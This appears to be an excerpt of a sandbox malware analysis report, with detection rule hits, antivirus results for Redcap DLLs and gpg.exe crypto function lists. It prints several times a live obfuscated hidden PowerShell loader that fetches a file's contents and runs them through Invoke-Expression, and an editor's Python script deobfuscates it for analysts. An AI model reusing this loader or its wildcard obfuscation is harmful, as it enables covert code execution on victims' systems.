OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentImage: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentProcessId: 348, ParentProcessName: winapi.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -Va
Source: Process started; Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5240, ProcessName: svchost.exe
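The hidden PowerShell command line that the rules above matched names almost nothing directly: the target path is spliced from string fragments, and the cmdlets and .NET members are chosen by wildcard (Get-Command *e-*press*, Where-Object filters such as -clike 'D*g', a Variable:\*uti*t provider path), which PowerShell resolves by pattern-matching over whatever names are in scope. The script below is an added example by the editor, not Joe Sandbox code: it undoes the string splicing and performs the same wildcard resolution over a constructed, deliberately small table of cmdlet, automatic-variable and member names, so the candidate set it prints is an assumption about the session (a live session has far more names, and candidates can be wider). Treating the quoted wildcard passed to .Invoke('N*ct', …) as a command-name lookup is likewise an assumption that holds for the reflective GetCommandName call in this sample. The positional (…|GM)[6].Name selection is not a wildcard and is left to the analyst.

```python
"""Partial deobfuscation of the hidden PowerShell command line matched above.
Editor's own example, not Joe Sandbox code.  Undoes string splicing, $('a'+'b'+...),
and wildcard name resolution (Get-Command *e-*press*, -clike 'D*g', Variable:\*uti*t),
which PowerShell answers by pattern-matching over the names in scope.  The name
tables are constructed and small: an assumption, candidates can be wider live."""
import fnmatch
import re

CONCAT_RE = re.compile(r"\$\(((?:'[^']*'\s*\+\s*)+'[^']*')\)")


def splice_strings(cmd: str) -> str:
    """Replace $('a'+'b'+...) with the single-quoted literal it evaluates to."""
    return CONCAT_RE.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'", cmd)


# Constructed lookup tables (not exhaustive): cmdlet names, automatic variables,
# and members of System.Net.WebClient and $ExecutionContext.InvokeCommand.
TABLES = {
    "cmdlet": ["Invoke-Expression", "Invoke-Command", "Invoke-WebRequest", "New-Object",
               "New-Item", "Compress-Archive", "Expand-Archive", "Get-Command",
               "Get-Member", "Set-Variable", "Get-Variable"],
    "variable": ["ExecutionContext", "Error", "Host", "Input", "PSHome", "PSVersionTable"],
    "member": ["DownloadData", "DownloadFile", "DownloadString", "DownloadStringAsync",
               "DownloadStringTaskAsync", "OpenRead", "UploadString", "Dispose",
               "ExpandString", "GetCmdlet", "GetCmdletByTypeName", "GetCommand",
               "GetCommandName", "GetCommands", "InvokeScript", "NewScriptBlock"],
}

# (scope, regex capturing the pattern, case-sensitive?).  -clike is the only
# case-sensitive form; command and variable lookups ignore case.  A quoted
# wildcard handed to .Invoke('...') is treated as a command-name lookup, which
# is an assumption that fits the reflective GetCommandName call in this sample.
LOOKUPS = [
    ("cmdlet",   re.compile(r"Get-Command\s+([\w*?\-]+)"), False),
    ("cmdlet",   re.compile(r"GetCommandName\('([^']+)'"), False),
    ("cmdlet",   re.compile(r"\.Invoke\('([^']+)'"), False),
    ("variable", re.compile(r"Variable:[\\/]([\w*?]+)"), False),
    ("member",   re.compile(r"-clike\s*'([^']+)'"), True),
    ("member",   re.compile(r"-i?like\s*'([^']+)'"), False),
]


def resolve(pattern: str, names: list, case_sensitive: bool) -> list:
    """Names matching a PowerShell-style wildcard, the way Get-Command and -like do."""
    if case_sensitive:
        return sorted(n for n in names if fnmatch.fnmatchcase(n, pattern))
    return sorted(n for n in names if fnmatch.fnmatchcase(n.lower(), pattern.lower()))


def resolve_wildcards(cmd: str) -> list:
    """(scope, pattern, candidates) per distinct wildcard lookup, in order of appearance."""
    hits = []
    for scope, rx, cs in LOOKUPS:
        for m in rx.finditer(cmd):
            if any(ch in m.group(1) for ch in "*?"):   # skip plain names like Variable:\Sh
                hits.append((m.start(), scope, m.group(1), cs))
    seen, out = set(), []
    for _, scope, pat, cs in sorted(hits):
        if (scope, pat) not in seen:
            seen.add((scope, pat))
            out.append((scope, pat, resolve(pat, TABLES[scope], cs)))
    return out


# The command line from the process tree above (PID 1000), copied verbatim.
SAMPLE = r"""
powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"
""".strip()

if __name__ == "__main__":
    print(splice_strings(SAMPLE))
    for scope, pat, cands in resolve_wildcards(SAMPLE):
        print(f"{scope:<9} {pat:<12} -> {cands}")
```

Under these tables the lookups resolve to $ExecutionContext, GetCmdlet, GetCommandName, New-Object, DownloadString and Invoke-Expression, in that order: the script builds a Net.WebClient through New-Object, reads the spliced path C:\ProgramData\Microsoft\MicrosoftAPI\ieQu4aeD3u.t with DownloadString, and passes the result to Invoke-Expression. Because the resolution is done by the same wildcard semantics PowerShell applies, the same code reads the second variant (PID 6080), whose -ilike 'G*d' and GetCommandName('N*-O*', …) fall under the case-insensitive rules.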

Data Obfuscation

Source: Process started; Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1000, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", ProcessId: 7428, ProcessName: csc.exe
No Suricata rule has matched

AV Detection

Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dll; Avira: detection malicious, Label: TR/Redcap.rclpi
Source: C:\ProgramData\Microsoft\UpdateDesktop\aclui.dll; Avira: detection malicious, Label: TR/Redcap.rclpi
Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui.dll; Avira: detection malicious, Label: TR/Redcap.tjlhz
Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dll; ReversingLabs: Detection: 62%
Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui.dll; ReversingLabs: Detection: 62%
Source: C:\ProgramData\Microsoft\UpdateDesktop\aclui.dll; ReversingLabs: Detection: 62%
Source: VirtManage.exe; Virustotal: Detection: 13%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 95.5% probability
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00458059 gcry_free,gcry_cipher_close,gpgrt_log_debug,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gpg_strerror,gpgrt_log_error,1_2_00458059
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_004561E6 gcry_cipher_get_algo_blklen,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_decrypt,gcry_cipher_ctl,1_2_004561E6
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00464220 gcry_cipher_open,gcry_sexp_release,gcry_free,gcry_free,gcry_free,gcry_cipher_close,gcry_free,gcry_cipher_setkey,gcry_free,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_sexp_build_array,gcry_free,gpgrt_snprintf,gcry_sexp_build,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gpg_strerror,gpgrt_log_error,gcry_sexp_build,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_malloc,gcry_cipher_encrypt,gcry_free,gcry_free,gcry_mpi_get_flag,gpg_strerror,_gpg_w32_gettext,gpgrt_log_error,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,gpgrt_log_info,gpg_strerror,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_info,gpg_err_code_from_syserror,gcry_free,gcry_free,_gpg_w32_gettext,gpgrt_log_info,gpg_strerror,gpgrt_log_error,gpgrt_log,abort,gpg_err_code_from_syserror,1_2_00464220
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00458420 gcry_malloc_secure,memcpy,gcry_cipher_open,gcry_cipher_close,gcry_free,gcry_free,gcry_malloc_secure,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,memcpy,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gcry_calloc,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_encrypt,gpg_err_code_from_syserror,gpg_err_code_from_syserror,1_2_00458420
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_004564E7 gcry_cipher_decrypt,gcry_cipher_ctl,1_2_004564E7
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044E530 gcry_mpi_get_flag,gcry_malloc_secure,memcpy,gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpg_err_code_from_syserror,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,1_2_0044E530
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044E677 gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,1_2_0044E677
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00456631 gcry_md_write,gcry_free,gcry_md_get_algo_dlen,gcry_cipher_decrypt,gcry_md_write,gcry_md_ctl,1_2_00456631
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044E920 gcry_mpi_get_flag,gcry_mpi_get_opaque,gcry_malloc_secure,memcpy,gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpgrt_log_error,gcry_free,gcry_cipher_close,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,1_2_0044E920
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044C9A0 gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_malloc,memcpy,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_free,gcry_mpi_release,gcry_mpi_get_opaque,gcry_free,gpgrt_log_debug,gcry_mpi_dump,gpgrt_log_printf,gpg_err_code_from_syserror,gcry_mpi_release,gcry_sexp_build,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_sexp_build,gcry_pk_testkey,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gpg_err_code_from_syserror,1_2_0044C9A0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044CA78 gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,1_2_0044CA78
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044EAB9 gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_printhex,1_2_0044EAB9
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00454B00 _gpgrt_log_assert,gcry_cipher_decrypt,gcry_md_write,memcpy,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_cipher_decrypt,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,1_2_00454B00
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044CD08 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_mpi_release,1_2_0044CD08
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00456E56 gcry_md_write,gcry_cipher_encrypt,gpgrt_log_info,1_2_00456E56
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0044CE61 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gpg_err_code_from_syserror,gcry_mpi_release,1_2_0044CE61
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00454EAC gcry_cipher_decrypt,1_2_00454EAC
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00427350 gcry_xcalloc,gpgrt_log_error,gcry_xcalloc,gcry_xcalloc,gcry_free,_gpg_w32_gettext,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_error,gcry_cipher_open,gcry_cipher_close,gpg_strerror,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,gpg_strerror,gpgrt_log_info,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,gcry_cipher_ctl,gcry_cipher_decrypt,gcry_cipher_checktag,memcpy,gcry_cipher_close,gcry_cipher_decrypt,gcry_cipher_close,gpg_strerror,gpgrt_log_info,gcry_cipher_get_algo_keylen,gcry_cipher_close,gpgrt_log_debug,gcry_cipher_close,gcry_cipher_close,gcry_cipher_close,gpgrt_log_fatal,1_2_00427350
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_00455326 memcpy,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_decrypt,memcpy,memmove,gcry_cipher_checktag,1_2_00455326
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe; Code function: 1_2_0046B3E0 gcry_free,gcry_sexp_release,gcry_free,gcry_free,_gpg_w32_gettext,gpg_strerror,gpgrt_log_error,gcry_malloc_secure,gcry_cipher_decrypt,gpgrt_log_info,gcry_sexp_canon_len,gcry_sexp_sscan,gcry_sexp_find_token,gcry_sexp_cadr,gcry_sexp_release,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_length,gcry_sexp_nth,gcry_sexp_nth_string,gcry_pk_map_name,gcry_calloc,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_extract_param,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_free,gcry_mpi_cmp,gcry_calloc,gcry_calloc,gcry_mpi_set_opaque,memset,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_sexp_find_token,gcry_mpi_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_nth_string,gcry_cipher_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtol,gcry_free,gcry_sexp_nth_string,gcry_md_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtoul,gcry_free,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_nth_data,gcry_mpi_set_opaque_copy,gcry_mpi_set_flag,memcmp,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_sexp_extract_param,gpg_err_code_from_syserror,gcry_sexp_extract_param,gcry_free,gcry_sexp_release,gcry_sexp_release,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_set_flag,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_mpi_release,gcry_mpi_scan,gcry_free,gcry_sexp_
release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_sexp_release,gcry_sexp_release,gcry_mpi_cmp,gcry_mpi_get_flag,gcry_calloc,gpg_err_code_from_syserror,gcry_mpi_copy,gpgrt_log_error,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_release,gcry_sexp_extract_param,1_2_0046B3E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0045766B gcry_cipher_get_algo_blklen,gcry_malloc,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_encrypt,gcry_cipher_gettag,1_2_0045766B
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457B24 gcry_cipher_ctl,gpgrt_log_printhex,gcry_cipher_encrypt,gpgrt_log_printhex,1_2_00457B24
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457C97 gpgrt_log_debug,gcry_cipher_encrypt,gcry_cipher_gettag,1_2_00457C97
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457D09 gcry_cipher_ctl,gpgrt_log_printhex,gcry_cipher_encrypt,gpgrt_log_printhex,gpgrt_log_debug,1_2_00457D09
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457D3C gcry_cipher_ctl,gpgrt_log_printhex,gcry_cipher_encrypt,gpgrt_log_printhex,gpgrt_log_debug,1_2_00457D3C
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00458059 gcry_free,gcry_cipher_close,gpgrt_log_debug,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gpg_strerror,gpgrt_log_error,3_2_00458059
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004561E6 gcry_cipher_get_algo_blklen,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_decrypt,gcry_cipher_ctl,3_2_004561E6
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00464220 gcry_cipher_open,gcry_sexp_release,gcry_free,gcry_free,gcry_free,gcry_cipher_close,gcry_free,gcry_cipher_setkey,gcry_free,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_sexp_build_array,gcry_free,gpgrt_snprintf,gcry_sexp_build,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gpg_strerror,gpgrt_log_error,gcry_sexp_build,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_malloc,gcry_cipher_encrypt,gcry_free,gcry_free,gcry_mpi_get_flag,gpg_strerror,_gpg_w32_gettext,gpgrt_log_error,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,gpgrt_log_info,gpg_strerror,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_info,gpg_err_code_from_syserror,gcry_free,gcry_free,_gpg_w32_gettext,gpgrt_log_info,gpg_strerror,gpgrt_log_error,gpgrt_log,abort,gpg_err_code_from_syserror,3_2_00464220
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00458420 gcry_malloc_secure,memcpy,gcry_cipher_open,gcry_cipher_close,gcry_free,gcry_free,gcry_malloc_secure,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,memcpy,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gcry_calloc,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_encrypt,gpg_err_code_from_syserror,gpg_err_code_from_syserror,3_2_00458420
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004564E7 gcry_cipher_decrypt,gcry_cipher_ctl,3_2_004564E7
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044E530 gcry_mpi_get_flag,gcry_malloc_secure,memcpy,gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpg_err_code_from_syserror,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E530
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044E677 gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,3_2_0044E677
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00456631 gcry_md_write,gcry_free,gcry_md_get_algo_dlen,gcry_cipher_decrypt,gcry_md_write,gcry_md_ctl,3_2_00456631
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044E920 gcry_mpi_get_flag,gcry_mpi_get_opaque,gcry_malloc_secure,memcpy,gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpgrt_log_error,gcry_free,gcry_cipher_close,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E920
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044C9A0 gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_malloc,memcpy,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_free,gcry_mpi_release,gcry_mpi_get_opaque,gcry_free,gpgrt_log_debug,gcry_mpi_dump,gpgrt_log_printf,gpg_err_code_from_syserror,gcry_mpi_release,gcry_sexp_build,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_sexp_build,gcry_pk_testkey,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gpg_err_code_from_syserror,3_2_0044C9A0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044CA78 gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,3_2_0044CA78
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044EAB9 gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_printhex,3_2_0044EAB9
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00454B00 _gpgrt_log_assert,gcry_cipher_decrypt,gcry_md_write,memcpy,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_cipher_decrypt,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,3_2_00454B00
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044CD08 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_mpi_release,3_2_0044CD08
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00456E56 gcry_md_write,gcry_cipher_encrypt,gpgrt_log_info,3_2_00456E56
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044CE61 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gpg_err_code_from_syserror,gcry_mpi_release,3_2_0044CE61
